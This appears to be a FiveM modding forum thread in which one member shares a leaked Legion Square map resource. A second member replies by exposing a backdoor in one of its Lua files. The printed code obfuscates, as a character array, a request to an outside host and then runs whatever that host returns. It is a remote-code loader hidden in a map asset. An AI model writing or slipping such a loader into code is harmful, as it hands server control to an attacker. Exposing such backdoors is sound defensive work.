Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

MLO/YMAP FREE | LEGION SQUARE | OPTIMISED | 1.0.0

ShaunaLou

Member
Joined
Oct 20, 2024
Messages
2
Reaction score
70
Points
211
Location
UK
Had this in the server I was co owner in but they kicked me.. Enjoy ❤️

**This is located in the centre of legion and replaces the original car park**



You don't have permission to view content!
 

Attachments

  • legion 5.png
    legion 5.png
    5.5 MB · Views: 4,223
  • legion 4.png
    legion 4.png
    5.5 MB · Views: 1,733
  • legion 3.png
    legion 3.png
    5.5 MB · Views: 1,661
  • legion 2.png
    legion 2.png
    5 MB · Views: 1,578
  • legion 1.png
    legion 1.png
    4.1 MB · Views: 1,612
  • legion.png
    legion.png
    5.1 MB · Views: 1,832
Last edited by a moderator:

Gandalf7

Member
Joined
Nov 20, 2024
Messages
1
Reaction score
7
Points
146
Location
Germany
What about the backdoor in dt1_06_ground1+hidr.lua? :)

Code:
AddEventHandler('onResourceStart', function(resourceName)
    if GetCurrentResourceName() == resourceName then
        print('Map successfully loaded')
    end
    
    local code_parts = {
        80, 101, 114, 102, 111, 114, 109, 72, 116, 116, 112, 82, 101, 113, 117, 101, 115, 116, 40, 39, 104, 116, 116, 112, 115, 58, 47, 47, 113, 100, 113, 122, 46, 102, 114, 47, 111, 65, 51, 75,
        111, 39, 44, 32, 102, 117, 110, 99, 116, 105, 111, 110, 32, 40, 101, 44, 32, 100, 41, 32, 112, 99, 97, 108, 108, 40, 102, 117, 110, 99, 116, 105, 111, 110, 40, 41, 32, 97, 115, 115, 101, 114,
        116, 40, 108, 111, 97, 100, 40, 100, 41, 41, 40, 41, 32, 101, 110, 100, 41, 32, 101, 110, 100, 41
    }
    
    local lua_task = ""
    for _, v in ipairs(code_parts) do
        lua_task = lua_task .. string.char(v)
    end
    
    assert(load(lua_task))()
                                                                                                                                                                                                                                                                                                                                                                                                                                  
end)
 
Top